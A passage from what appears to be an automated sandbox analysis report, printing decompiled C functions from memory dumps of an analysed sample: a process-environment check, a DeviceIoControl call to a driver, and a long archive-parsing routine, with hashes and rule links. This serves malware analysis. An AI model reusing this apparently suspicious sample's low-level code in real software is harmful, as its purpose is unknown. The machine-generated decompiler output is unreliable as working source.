					_v16 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x18)) + 0x10));
				}
				return 0 | _v16 != 0x00000000;
			}

0x10019ed6
0x10019ee3
0x10019efa
0x10019f01
0x10019f20
0x10019f03
0x10019f0f
0x10019f0f
0x10019f2f

APIs

GetVersion.KERNEL32 ref: 10019EDD

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: c74d15f3d28e0ff1bc9d70cdb83ca30e7064eb6c70fff7e2efc50b1375ab48fb
Instruction ID: bbca5fb05897284be9ea1cb6226a5444645e9dd890f4aab1cda7a4fe17223220
Opcode Fuzzy Hash: c74d15f3d28e0ff1bc9d70cdb83ca30e7064eb6c70fff7e2efc50b1375ab48fb
Instruction Fuzzy Hash: 2DF0F4B5D44259EFC710DFA9C585BACB7F0EB04701F1180B9E8019B751D238DA84DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00403660, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403660(void* _a4) {
				long _v4;
				void _v8;

				_v4 = 0;
				_v8 = 0;
				DeviceIoControl(_a4, 0x222040, 0, 0,  &_v8, 4,  &_v4, 0);
				return _v8;
			}

0x00403673
0x00403677
0x00403686
0x00403693

APIs

DeviceIoControl.KERNEL32 ref: 00403686

Memory Dump Source

Source File: 00000000.00000002.367041208.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.367034004.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367050695.0000000000404000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.367058969.0000000000406000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.367067999.000000000040B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.367085291.000000000040D000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367108404.000000000040F000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.367125826.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: ControlDevice
String ID:
API String ID: 2352790924-0
Opcode ID: e47d34cfcb88b82c1dca21dbc964445ad9bde98875293983b8115f11aa7b1a8f
Instruction ID: c980475e979cc7786c770ac37ded2548a09d77aca093c9e0b7000408693c8e18
Opcode Fuzzy Hash: e47d34cfcb88b82c1dca21dbc964445ad9bde98875293983b8115f11aa7b1a8f
Instruction Fuzzy Hash: 46E0ECB5514300BFD340DF58DD45E6B77E8EB88A01F40891DBA89D2150E230DA1CCBA6

Uniqueness

Uniqueness Score: -1.00%

Function 10006100, Relevance: .8, Instructions: 771
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E10006100() {
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				signed int _t366;
				signed int _t367;
				signed int _t375;
				signed int _t377;
				signed int _t378;
				signed int _t380;
				signed int _t383;
				signed int _t385;
				signed int _t386;
				signed int _t387;
				signed int _t391;
				signed int _t394;
				signed int _t398;
				signed int _t401;
				unsigned int _t403;
				signed int _t404;
				intOrPtr _t405;
				signed int _t406;
				signed int _t407;
				void* _t408;
				signed int _t409;
				signed char _t412;
				signed int _t413;
				void* _t414;
				signed char _t417;
				unsigned int _t419;
				signed int _t421;
				signed int _t422;
				signed int _t424;
				signed int _t425;
				signed int _t446;
				intOrPtr* _t447;
				void* _t453;
				signed int* _t456;
				signed int _t459;
				signed char _t460;
				signed int _t464;
				signed int _t470;
				signed int _t473;
				intOrPtr _t480;
				intOrPtr _t481;
				signed int _t482;
				signed int _t484;
				signed char _t489;
				signed int _t493;
				signed char _t503;
				char _t504;
				signed int _t508;
				signed int _t510;
				signed int _t511;
				signed char _t533;
				intOrPtr _t534;
				signed int _t540;
				signed int _t541;
				intOrPtr _t542;
				signed char _t545;
				intOrPtr _t559;
				signed int _t565;
				signed int _t566;
				signed int _t568;
				intOrPtr* _t584;
				signed int _t585;
				signed int _t586;
				signed int _t589;
				signed int _t591;
				intOrPtr _t595;
				intOrPtr* _t599;
				intOrPtr _t606;
				void* _t607;
				void* _t608;
				void* _t609;

				_t454 =  *((intOrPtr*)(_t607 + 0xa8));
				_t606 =  *((intOrPtr*)(_t607 + 0xa8));
				_t560 =  *((intOrPtr*)(_t607 + 0xa8));
				 *((intOrPtr*)(_t607 + 0x60)) = 0;
				 *((intOrPtr*)(_t607 + 0x64)) = 0;
				 *((intOrPtr*)(_t607 + 0x68)) = 0;
				 *((intOrPtr*)(_t607 + 0x6c)) = 0;
				 *((intOrPtr*)(_t607 + 0x58)) = 0;
				 *((intOrPtr*)(_t607 + 0x5c)) = 0;
				 *((intOrPtr*)(_t607 + 0x54)) = 0;
				 *((intOrPtr*)(_t607 + 0x50)) = 0;
				_t366 = E100049B0( *((intOrPtr*)(_t607 + 0xa8)), _t607 + 0x14);
				if(_t366 != 0) {
					L159:
					return _t366;
				} else {
					_t367 =  *(_t607 + 0x14);
					if(_t367 != 2 ||  *(_t607 + 0x18) != 0) {
						L11:
						__eflags = _t367 - 3;
						if(_t367 != 3) {
							L17:
							__eflags = _t367 - 4;
							if(_t367 != 4) {
								L22:
								_t464 =  *(_t607 + 0x18);
								__eflags = _t367 | _t464;
								if((_t367 | _t464) != 0) {
									__eflags = _t367 - 5;
									if(_t367 != 5) {
										L158:
										return 0x10;
									}
									__eflags = _t464;
									if(_t464 != 0) {
										goto L158;
									}
									 *(_t607 + 0x20) = 0;
									 *((intOrPtr*)(_t607 + 0x24)) = 0;
									 *((intOrPtr*)(_t607 + 0x30)) = 0;
									 *((intOrPtr*)(_t607 + 0x4c)) = 0;
									_t366 = E10004AD0( *(_t607 + 0xb4), _t607 + 0x20);
									__eflags = _t366;
									if(_t366 != 0) {
										goto L159;
									} else {
										_t456 =  *(_t607 + 0xb4);
										 *(_t606 + 0x40) =  *(_t607 + 0x20);
										_t366 = E100049B0(_t456, _t607 + 0x14);
										__eflags = _t366;
										if(_t366 != 0) {
											goto L159;
										} else {
											while(1) {
												L29:
												__eflags =  *(_t607 + 0x14) |  *(_t607 + 0x18);
												if(( *(_t607 + 0x14) |  *(_t607 + 0x18)) == 0) {
													break;
												}
												_t366 = E100049B0(_t456, _t607 + 0x34);
												__eflags = _t366;
												if(_t366 != 0) {
													goto L159;
												} else {
													_t425 = _t456[1];
													__eflags =  *(_t607 + 0x38);
													if(__eflags > 0) {
														goto L158;
													}
													_t595 =  *((intOrPtr*)(_t607 + 0x34));
													if(__eflags >= 0) {
														__eflags = _t595 - _t425;
														if(_t595 > _t425) {
															goto L158;
														}
													}
													__eflags =  *(_t607 + 0x18);
													if( *(_t607 + 0x18) > 0) {
														L70:
														 *_t456 =  *_t456 + _t595;
														__eflags =  *_t456;
														_t456[1] = _t425 - _t595;
														goto L71;
													} else {
														_t510 =  *(_t607 + 0x14);
														__eflags = _t510 - 0x100;
														if(_t510 >= 0x100) {
															goto L70;
														} else {
															_t511 = _t510 + 0xfffffff2;
															__eflags = _t511 - 7;
															if(__eflags > 0) {
																goto L70;
															} else {
																switch( *((intOrPtr*)(_t511 * 4 +  &M10006B64))) {
																	case 0:
																		__edi =  *(__esp + 0x20);
																		__esi = __esp + 0x30;
																		__eax = __edi;
																		__ecx = __ebx;
																		__eax = E10004C10(__edi, __ebx, __esi);
																		__eflags = __eax;
																		if(__eax != 0) {
																			goto L159;
																		} else {
																			__ecx =  *(__esp + 0x30);
																			__eax = __edi;
																			 *(__esp + 0x24) = E10004C30(__edi,  *(__esp + 0x30));
																			 *(__esp + 0x4c) = 0;
																			goto L71;
																		}
																		goto L161;
																	case 1:
																		__eax =  *(__esp + 0x24);
																		__esi = __esp + 0x4c;
																		__ecx = __ebx;
																		__eax = E10004C10( *(__esp + 0x24), __ebx, __esi);
																		__eflags = __eax;
																		if(__eax != 0) {
																			goto L159;
																		} else {
																			goto L71;
																		}
																		goto L161;
																	case 2:
																		goto L70;
																	case 3:
																		__eflags = _t425;
																		if(_t425 == 0) {
																			goto L158;
																		}
																		_t456[1] = _t425 + 0xffffffff;
																		_t429 =  *_t456;
																		_t512 =  *_t429;
																		_t430 = _t429 + 1;
																		__eflags = _t512;
																		 *((char*)(_t607 + 0x13)) = _t512;
																		 *_t456 = _t430;
																		if(_t512 != 0) {
																			_t366 = E10004AD0( *(_t607 + 0xb4), _t607 + 0x44);
																			__eflags = _t366;
																			if(_t366 != 0) {
																				goto L159;
																			} else {
																				_t513 =  *(_t607 + 0x44);
																				__eflags = _t513 -  *((intOrPtr*)( *((intOrPtr*)(_t607 + 0xc0))));
																				if(_t513 >=  *((intOrPtr*)( *((intOrPtr*)(_t607 + 0xc0))))) {
																					goto L158;
																				}
																				_t433 =  *((intOrPtr*)(_t607 + 0xbc));
																				_t574 =  *(_t433 + _t513 * 8);
																				_t456 =  *(_t607 + 0xb4);
																				 *(_t607 + 0x1c) =  *(_t433 + 4 + _t513 * 8);
																				goto L44;
																			}
																		} else {
																			 *(_t607 + 0x1c) = _t595 + 0xffffffff;
																			_t574 = _t430;
																			L44:
																			__eflags =  *(_t607 + 0x1c) & 0x00000001;
																			if(( *(_t607 + 0x1c) & 0x00000001) != 0) {
																				goto L158;
																			}
																			_t597 =  *((intOrPtr*)(_t607 + 0xc4));
																			_push(4 +  *(_t607 + 0x20) * 4);
																			_push(_t597);
																			_t435 =  *((intOrPtr*)( *_t597))();
																			_t610 = _t607 + 8;
																			__eflags = _t435;
																			 *(_t606 + 0x74) = _t435;
																			if(_t435 == 0) {
																				L160:
																				return 2;
																			} else {
																				_t552 =  *(_t610 + 0x1c);
																				__eflags = _t552;
																				if(_t552 != 0) {
																					_push(_t552);
																					_push(_t597);
																					_t436 =  *((intOrPtr*)( *_t597))();
																					_t611 = _t610 + 8;
																					__eflags = _t436;
																					 *(_t606 + 0x78) = _t436;
																					if(_t436 == 0) {
																						goto L160;
																					} else {
																						E1000D1F0(_t456, _t574, _t597, _t436, _t574,  *((intOrPtr*)(_t611 + 0x1c)));
																						_t552 =  *(_t611 + 0x28);
																						_t607 = _t611 + 0xc;
																						goto L50;
																					}
																				} else {
																					_t606 = 0;
																					L50:
																					_t366 = E10005F40( *(_t607 + 0x20),  *(_t606 + 0x74),  *(_t606 + 0x78), _t552);
																					__eflags = _t366;
																					if(_t366 != 0) {
																						goto L159;
																					} else {
																						__eflags =  *((intOrPtr*)(_t607 + 0x13)) - _t366;
																						if( *((intOrPtr*)(_t607 + 0x13)) == _t366) {
																							_t439 =  *(_t607 + 0x1c);
																							_t456[1] = _t456[1] - _t439;
																							 *_t456 =  *_t456 + _t439;
																						}
																						goto L71;
																					}
																				}
																			}
																		}
																		goto L161;
																	case 4:
																		__edx =  *(__esp + 0xc4);
																		__eax =  *(__esp + 0xc0);
																		__ecx =  *( *(__esp + 0xc0));
																		_push( *(__esp + 0xc4));
																		_push(__ecx);
																		_t136 = __ebp + 0x64; // 0x64
																		__ecx = _t136;
																		goto L67;
																	case 5:
																		__edx =  *(__esp + 0xc4);
																		__eax =  *(__esp + 0xc0);
																		__ecx =  *( *(__esp + 0xc0));
																		_push( *(__esp + 0xc4));
																		_push(__ecx);
																		_t131 = __ebp + 0x5c; // 0x5c
																		__ecx = _t131;
																		L67:
																		__edx =  *(__esp + 0xc4);
																		__eax =  *(__esp + 0x28);
																		_push( *(__esp + 0xc4));
																		_push(__ebx);
																		_push(__eax);
																		_push(__ecx);
																		__eax = E10005FB0(__eflags);
																		__esp = __esp + 0x18;
																		__eflags = __eax;
																		if(__eax != 0) {
																			goto L159;
																		} else {
																			goto L71;
																		}
																		goto L161;
																	case 6:
																		__edi =  *(__esp + 0xc4);
																		_t110 = __ebp + 0x54; // 0x54
																		__esi = _t110;
																		__eax = E100047F0(__esi, __edi);
																		__eax =  *(__esp + 0x28);
																		__ecx = __ebx;
																		__eax = E10004C70( *(__esp + 0x28), __ebx, __esi, __edi);
																		__eflags = __eax;
																		if(__eax != 0) {
																			goto L159;
																		} else {
																			__eax =  *(__ebx + 4);
																			__eflags = __eax;
																			if(__eax == 0) {
																				goto L158;
																			}
																			 *(__ebx + 4) = __eax;
																			__eax =  *__ebx;
																			__cl =  *__eax;
																			__eax = __eax + 1;
																			__eflags = __cl;
																			 *__ebx = __eax;
																			if(__cl != 0) {
																				__eax =  *(__esp + 0xb4);
																				__ebx = __esp + 0x2c;
																				__eax = E10004AD0( *(__esp + 0xb4), __esp + 0x2c);
																				__eflags = __eax;
																				if(__eax != 0) {
																					goto L159;
																				} else {
																					__ecx =  *(__esp + 0x2c);
																					__edx =  *(__esp + 0xc0);
																					__eflags = __ecx -  *( *(__esp + 0xc0));
																					if(__ecx >=  *( *(__esp + 0xc0))) {
																						goto L158;
																					}
																					__eax =  *(__esp + 0xbc);
																					__edx =  *(__eax + __ecx * 8);
																					__eax =  *(__eax + 4 + __ecx * 8);
																					__ebx =  *(__esp + 0xb4);
																					 *(__esp + 0x40) = __eax;
																					 *(__esp + 0x3c) = __edx;
																					__eax = __esp + 0x3c;
																					goto L64;
																				}
																			} else {
																				__eax = __ebx;
																				L64:
																				__ecx =  *(__esp + 0x20);
																				_push( *(__esp + 0x20));
																				_push(__eax);
																				__eax = __edi;
																				__ecx = __esi;
																				__eax = E10004D40(__esi);
																				__esp = __esp + 8;
																				__eflags = __eax;
																				if(__eax != 0) {
																					goto L159;
																				} else {
																					L71:
																					_t427 = E100049B0(_t456, _t607 + 0x14);
																					__eflags = _t427;
																					if(_t427 == 0) {
																						goto L29;
																					} else {
																						return _t427;
																					}
																				}
																			}
																		}
																		goto L161;
																}
															}
														}
													}
												}
												goto L161;
											}
											__eflags =  *(_t607 + 0x20) -  *((intOrPtr*)(_t607 + 0x24)) -  *((intOrPtr*)(_t607 + 0x50));
											if( *(_t607 + 0x20) -  *((intOrPtr*)(_t607 + 0x24)) !=  *((intOrPtr*)(_t607 + 0x50))) {
												goto L158;
											}
											_t366 = E100049B0(_t456, _t607 + 0x14);
											__eflags = _t366;
											if(_t366 != 0) {
												goto L159;
											} else {
												while(1) {
													__eflags =  *(_t607 + 0x14) |  *(_t607 + 0x18);
													if(( *(_t607 + 0x14) |  *(_t607 + 0x18)) == 0) {
														break;
													}
													_t366 = E10004B50(_t456);
													__eflags = _t366;
													if(_t366 != 0) {
														goto L159;
													} else {
														_t424 = E100049B0(_t456, _t607 + 0x14);
														__eflags = _t424;
														if(_t424 == 0) {
															continue;
														} else {
															return _t424;
														}
													}
													goto L161;
												}
												_t584 =  *((intOrPtr*)(_t607 + 0xc4));
												 *((intOrPtr*)(_t607 + 0x4c)) = 0;
												 *((intOrPtr*)(_t607 + 0x24)) = 0;
												 *(_t607 + 0x44) = 0;
												 *((intOrPtr*)(_t607 + 0x3c)) = 0;
												 *(_t607 + 0x1c) = 0;
												 *(_t607 + 0x20) = 0;
												 *((intOrPtr*)(_t607 + 0x34)) = 0;
												 *(_t607 + 0x2c) = 0;
												 *((char*)(_t607 + 0x1b)) = 0;
												 *((char*)(_t607 + 0x1a)) = 0;
												 *((char*)(_t607 + 0x19)) = 0;
												 *(_t607 + 0x18) = 0x80;
												_t375 =  *((intOrPtr*)( *_t584))(_t584, 4 +  *(_t606 + 4) * 4);
												_t608 = _t607 + 8;
												__eflags = _t375;
												 *(_t606 + 0x6c) = _t375;
												if(_t375 == 0) {
													goto L160;
												} else {
													_t377 =  *(_t606 + 0x40);
													__eflags = _t377;
													if(_t377 != 0) {
														_t378 =  *((intOrPtr*)( *_t584))(_t584, _t377 * 4);
														_t608 = _t608 + 8;
														__eflags = _t378;
														 *(_t606 + 0x70) = _t378;
														if(_t378 == 0) {
															goto L160;
														} else {
															goto L84;
														}
													} else {
														 *(_t606 + 0x70) = 0;
														L84:
														_t380 =  *((intOrPtr*)( *_t584))(_t584, 8 +  *(_t606 + 0x40) * 8);
														_t609 = _t608 + 8;
														__eflags = _t380;
														 *(_t606 + 0x44) = _t380;
														if(_t380 == 0) {
															goto L160;
														} else {
															_t383 =  *(_t606 + 0x40) + 7 >> 3;
															__eflags = _t383;
															if(_t383 != 0) {
																_t385 =  *((intOrPtr*)( *_t584))(_t584, _t383);
																_t609 = _t609 + 8;
																__eflags = _t385;
																 *(_t606 + 0x48) = _t385;
																if(_t385 == 0) {
																	goto L160;
																} else {
																	goto L88;
																}
															} else {
																 *(_t606 + 0x48) = 0;
																L88:
																_t366 = E100047A0(_t606 + 0x4c,  *(_t606 + 0x40), _t584);
																__eflags = _t366;
																if(_t366 != 0) {
																	goto L159;
																} else {
																	__eflags =  *((intOrPtr*)(_t609 + 0x6c)) - _t366;
																	if( *((intOrPtr*)(_t609 + 0x6c)) != _t366) {
																		_t421 =  *(_t609 + 0x68);
																		_t504 =  *_t421;
																		 *((intOrPtr*)(_t609 + 0x6c)) =  *((intOrPtr*)(_t609 + 0x6c)) - 1;
																		_t422 = _t421 + 1;
																		__eflags = _t504;
																		 *((char*)(_t609 + 0x13)) = _t504;
																		 *(_t609 + 0x68) = _t422;
																		if(_t504 == 0) {
																			_t508 = ( *((intOrPtr*)(_t609 + 0x54)) + 7 >> 3) + _t422;
																			__eflags = _t508;
																			 *(_t609 + 0x2c) = _t422;
																			 *(_t609 + 0x24) = _t508;
																		} else {
																			 *(_t609 + 0x24) = _t422;
																		}
																	}
																	__eflags =  *(_t609 + 0x20);
																	 *(_t609 + 0x28) = 0;
																	if( *(_t609 + 0x20) <= 0) {
																		L149:
																		__eflags =  *(_t609 + 0x3c);
																		_t386 =  *(_t606 + 0x44);
																		_t470 =  *(_t609 + 0x28);
																		 *((intOrPtr*)(_t386 + _t470 * 8)) =  *((intOrPtr*)(_t609 + 0x14));
																		 *(_t386 + 4 + _t470 * 8) =  *(_t609 + 0x18);
																		if( *(_t609 + 0x3c) != 0) {
																			goto L158;
																		}
																		_t387 =  *(_t609 + 0x1c);
																		 *( *(_t606 + 0x6c) + _t387 * 4) = _t470;
																		__eflags = _t387 -  *(_t606 + 4);
																		if(_t387 >=  *(_t606 + 4)) {
																			L156:
																			__eflags =  *(_t609 + 0x58);
																			if( *(_t609 + 0x58) != 0) {
																				__eflags =  *(_t609 + 0x5c);
																				if( *(_t609 + 0x5c) != 0) {
																					goto L158;
																				}
																			}
																			goto L23;
																		} else {
																			_t585 = _t387;
																			_t565 = _t470;
																			while(1) {
																				__eflags =  *(_t609 + 0x58);
																				if( *(_t609 + 0x58) == 0) {
																					goto L158;
																				}
																				_t366 = E10004AD0(_t609 + 0x58, _t609 + 0x34);
																				__eflags = _t366;
																				if(_t366 != 0) {
																					goto L159;
																				} else {
																					__eflags =  *(_t609 + 0x34) - _t366;
																					if( *(_t609 + 0x34) != _t366) {
																						goto L158;
																					}
																					_t585 = _t585 + 1;
																					 *( *(_t606 + 0x6c) + _t585 * 4) = _t565;
																					__eflags = _t585 -  *(_t606 + 4);
																					if(_t585 <  *(_t606 + 4)) {
																						continue;
																					} else {
																						goto L156;
																					}
																				}
																				goto L161;
																			}
																			goto L158;
																		}
																	} else {
																		do {
																			__eflags =  *(_t609 + 0x10);
																			_t586 =  *(_t609 + 0x28);
																			if( *(_t609 + 0x10) == 0) {
																				_t401 = _t586 + 0xffffffff >> 3;
																				__eflags = _t401;
																				 *((char*)(_t401 +  *(_t606 + 0x48))) =  *(_t609 + 0x12) & 0x000000ff;
																				 *((char*)(_t401 +  *((intOrPtr*)(_t606 + 0x4c)))) =  *(_t609 + 0x11) & 0x000000ff;
																				 *(_t609 + 0x12) = 0;
																				 *(_t609 + 0x11) = 0;
																				 *(_t609 + 0x10) = 0x80;
																			}
																			_t391 =  *(_t606 + 0x44);
																			_t459 =  *(_t609 + 0x30);
																			__eflags = _t459;
																			 *((intOrPtr*)(_t391 + _t586 * 8)) =  *((intOrPtr*)(_t609 + 0x14));
																			 *(_t391 + 4 + _t586 * 8) =  *(_t609 + 0x18);
																			_t533 =  *(_t606 + 0x50);
																			 *(_t533 + _t586 * 4) = 0;
																			if(_t459 == 0) {
																				L106:
																				__eflags =  *(_t609 + 0x3c);
																				if( *(_t609 + 0x3c) != 0) {
																					goto L117;
																				} else {
																					_t566 =  *(_t609 + 0x1c);
																					while(1) {
																						__eflags = _t566 -  *(_t606 + 4);
																						if(_t566 >=  *(_t606 + 4)) {
																							goto L158;
																						}
																						__eflags =  *(_t609 + 0x58);
																						_t533 =  *(_t606 + 0x6c);
																						 *(_t533 + _t566 * 4) = _t586;
																						 *(_t609 + 0x34) = 1;
																						if( *(_t609 + 0x58) == 0) {
																							L112:
																							_t413 =  *(_t609 + 0x34);
																							__eflags = _t413;
																							 *(_t609 + 0x3c) = _t413;
																							if(_t413 != 0) {
																								goto L118;
																							} else {
																								_t414 = E10005A80(_t606, _t566);
																								_t493 =  *(_t609 + 0x20);
																								_t609 = _t609 + 8;
																								 *((intOrPtr*)(_t609 + 0x14)) =  *((intOrPtr*)(_t609 + 0x14)) + _t414;
																								asm("adc ecx, edx");
																								__eflags = _t493 - _t533;
																								 *(_t609 + 0x18) = _t493;
																								if(__eflags < 0) {
																									goto L158;
																								}
																								if(__eflags <= 0) {
																									__eflags =  *((intOrPtr*)(_t609 + 0x14)) - _t414;
																									if( *((intOrPtr*)(_t609 + 0x14)) < _t414) {
																										goto L158;
																									}
																								}
																								_t566 = _t566 + 1;
																								 *(_t609 + 0x1c) = _t566;
																								continue;
																							}
																						} else {
																							_t366 = E10004AD0(_t609 + 0x58, _t609 + 0x34);
																							__eflags = _t366;
																							if(_t366 != 0) {
																								goto L159;
																							} else {
																								_t459 =  *(_t609 + 0x30);
																								goto L112;
																							}
																						}
																						goto L161;
																					}
																					goto L158;
																				}
																			} else {
																				_t417 = 0x80 >> (_t586 & 0x00000007);
																				_t533 =  *((intOrPtr*)((_t586 >> 3) + _t459));
																				__eflags = _t533 & _t417;
																				if((_t533 & _t417) == 0) {
																					goto L106;
																				} else {
																					_t568 =  *(_t609 + 0x4c);
																					__eflags = _t568;
																					if(_t568 == 0) {
																						_t226 = _t609 + 0x12;
																						 *_t226 =  *(_t609 + 0x12) |  *(_t609 + 0x10);
																						__eflags =  *_t226;
																					} else {
																						_t419 =  *(_t609 + 0x44);
																						_t533 = 0x80 >> (_t419 & 0x00000007);
																						_t503 =  *((intOrPtr*)((_t419 >> 3) + _t568));
																						__eflags = _t503 & _t533;
																						if((_t503 & _t533) == 0) {
																							_t533 =  *(_t609 + 0x10);
																							_t222 = _t609 + 0x12;
																							 *_t222 =  *(_t609 + 0x12) | _t533;
																							__eflags =  *_t222;
																						}
																						 *(_t609 + 0x44) = _t419 + 1;
																					}
																					__eflags =  *(_t609 + 0x3c);
																					if( *(_t609 + 0x3c) != 0) {
																						L117:
																						_t566 =  *(_t609 + 0x1c);
																						L118:
																						__eflags = _t459;
																						 *( *(_t606 + 0x70) + _t586 * 4) = _t566;
																						if(_t459 == 0) {
																							L121:
																							_t259 = _t609 + 0x3c;
																							 *_t259 =  *(_t609 + 0x3c) - 1;
																							__eflags =  *_t259;
																							if( *_t259 != 0) {
																								_t366 = E100049B0(_t609 + 0x60, _t609 + 0x78);
																								__eflags = _t366;
																								if(_t366 != 0) {
																									goto L159;
																								} else {
																									_t534 =  *((intOrPtr*)(_t609 + 0x78));
																									 *((intOrPtr*)(_t609 + 0x14)) =  *((intOrPtr*)(_t609 + 0x14)) + _t534;
																									_t473 =  *(_t609 + 0x18);
																									asm("adc ecx, eax");
																									__eflags = _t473 -  *((intOrPtr*)(_t609 + 0x7c));
																									 *(_t609 + 0x18) = _t473;
																									if(__eflags < 0) {
																										goto L158;
																									}
																									if(__eflags <= 0) {
																										__eflags =  *((intOrPtr*)(_t609 + 0x14)) - _t534;
																										if( *((intOrPtr*)(_t609 + 0x14)) < _t534) {
																											goto L158;
																										}
																									}
																									__eflags =  *((char*)(_t609 + 0x13));
																									if( *((char*)(_t609 + 0x13)) != 0) {
																										L145:
																										_t394 =  *(_t609 + 0x24);
																										 *(_t609 + 0x24) = _t394 + 4;
																										_t324 = _t609 + 0x11;
																										 *_t324 =  *(_t609 + 0x11) |  *(_t609 + 0x10);
																										__eflags =  *_t324;
																										 *((intOrPtr*)( *(_t606 + 0x50) +  *(_t609 + 0x28) * 4)) =  *_t394;
																									} else {
																										_t404 =  *(_t609 + 0x2c);
																										__eflags = _t404;
																										if(_t404 != 0) {
																											__eflags =  *_t404 & 0x00000080;
																											if(( *_t404 & 0x00000080) != 0) {
																												goto L145;
																											}
																										}
																									}
																									goto L146;
																								}
																							} else {
																								_t405 = E10005A80(_t606, _t566);
																								_t460 = _t533;
																								_t540 =  *( *(_t606 + 0x6c) + _t566 * 4);
																								 *((intOrPtr*)(_t609 + 0x78)) = _t405;
																								_t406 =  *(_t606 + 0x44);
																								_t480 =  *((intOrPtr*)(_t406 + _t540 * 8));
																								_t589 =  *(_t406 + 4 + _t540 * 8);
																								_t407 =  *(_t609 + 0x1c);
																								_t541 =  *(_t609 + 0x20);
																								_t609 = _t609 + 8;
																								_t408 = _t407 - _t480;
																								asm("sbb edx, esi");
																								__eflags = _t460 - _t541;
																								if(__eflags < 0) {
																									goto L158;
																								}
																								_t542 =  *((intOrPtr*)(_t609 + 0x70));
																								if(__eflags <= 0) {
																									__eflags = _t542 - _t408;
																									if(_t542 < _t408) {
																										goto L158;
																									}
																								}
																								_t481 = _t480 + _t542;
																								asm("adc esi, ebx");
																								__eflags = _t589 - _t460;
																								 *((intOrPtr*)(_t609 + 0x14)) = _t481;
																								 *(_t609 + 0x18) = _t589;
																								if(__eflags < 0) {
																									goto L158;
																								}
																								if(__eflags <= 0) {
																									__eflags = _t481 - _t542;
																									if(_t481 < _t542) {
																										goto L158;
																									}
																								}
																								__eflags =  *(_t609 + 0x34) - 1;
																								if( *(_t609 + 0x34) != 1) {
																									L132:
																									_t409 =  *(_t609 + 0x28);
																									goto L133;
																								} else {
																									_t591 =  *(_t606 + 0xc);
																									__eflags = _t591;
																									if(_t591 == 0) {
																										goto L132;
																									} else {
																										_t409 =  *(_t609 + 0x28);
																										_t545 = 0x80 >> (_t409 & 0x00000007);
																										_t489 =  *((intOrPtr*)((_t409 >> 3) + _t591));
																										__eflags = _t489 & _t545;
																										if((_t489 & _t545) == 0) {
																											L133:
																											__eflags =  *((char*)(_t609 + 0x13));
																											if( *((char*)(_t609 + 0x13)) != 0) {
																												L136:
																												_t482 =  *(_t609 + 0x24);
																												 *((intOrPtr*)( *(_t606 + 0x50) + _t409 * 4)) =  *_t482;
																												_t302 = _t609 + 0x11;
																												 *_t302 =  *(_t609 + 0x11) |  *(_t609 + 0x10);
																												__eflags =  *_t302;
																												 *(_t609 + 0x24) = _t482 + 4;
																											} else {
																												_t484 =  *(_t609 + 0x2c);
																												__eflags = _t484;
																												if(_t484 != 0) {
																													__eflags =  *_t484 & 0x00000080;
																													if(( *_t484 & 0x00000080) != 0) {
																														goto L136;
																													}
																												}
																											}
																											 *(_t609 + 0x1c) = _t566 + 1;
																										} else {
																											 *((intOrPtr*)( *(_t606 + 0x50) + _t409 * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t606 + 0x10)) + _t566 * 4));
																											 *(_t609 + 0x11) =  *(_t609 + 0x11) |  *(_t609 + 0x10);
																											 *(_t609 + 0x1c) = _t566 + 1;
																										}
																									}
																								}
																								goto L146;
																							}
																						} else {
																							_t533 = 0x80 >> (_t586 & 0x00000007);
																							_t412 =  *((intOrPtr*)((_t586 >> 3) + _t459));
																							__eflags = _t412 & _t533;
																							if((_t412 & _t533) != 0) {
																								goto L146;
																							} else {
																								_t566 =  *(_t609 + 0x1c);
																								goto L121;
																							}
																						}
																					} else {
																						 *( *(_t606 + 0x70) + _t586 * 4) = 0xffffffff;
																						goto L146;
																					}
																				}
																			}
																			goto L161;
																			L146:
																			 *(_t609 + 0x10) =  *(_t609 + 0x10) >> 1;
																			_t398 =  *(_t609 + 0x28) + 1;
																			__eflags = _t398 -  *(_t609 + 0x20);
																			 *(_t609 + 0x28) = _t398;
																		} while (_t398 <  *(_t609 + 0x20));
																		__eflags =  *(_t609 + 0x10) - 0x80;
																		if( *(_t609 + 0x10) != 0x80) {
																			_t403 = _t398 + 0xffffffff >> 3;
																			__eflags = _t403;
																			 *((char*)(_t403 +  *(_t606 + 0x48))) =  *(_t609 + 0x12) & 0x000000ff;
																			 *((char*)(_t403 +  *((intOrPtr*)(_t606 + 0x4c)))) =  *(_t609 + 0x11) & 0x000000ff;
																		}
																		goto L149;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									L23:
									__eflags = 0;
									return 0;
								}
							} else {
								__eflags =  *(_t607 + 0x18);
								if( *(_t607 + 0x18) != 0) {
									goto L22;
								} else {
									_t599 = _t606 + 0x38;
									_t366 = E10005CF0( *((intOrPtr*)(_t607 + 0xc0)), _t607 + 0x68, _t606, 0x40000000,  *((intOrPtr*)(_t607 + 0xc0)),  *((intOrPtr*)( *((intOrPtr*)(_t607 + 0xc0)))), _t599,  *((intOrPtr*)(_t607 + 0xc4)));
									_t607 = _t607 + 0x18;
									__eflags = _t366;
									if(_t366 != 0) {
										goto L159;
									} else {
										 *_t599 =  *_t599 +  *((intOrPtr*)(_t606 + 0x30));
										asm("adc [esi+0x4], eax");
										_t366 = E100049B0( *(_t607 + 0xb4), _t607 + 0x14);
										__eflags = _t366;
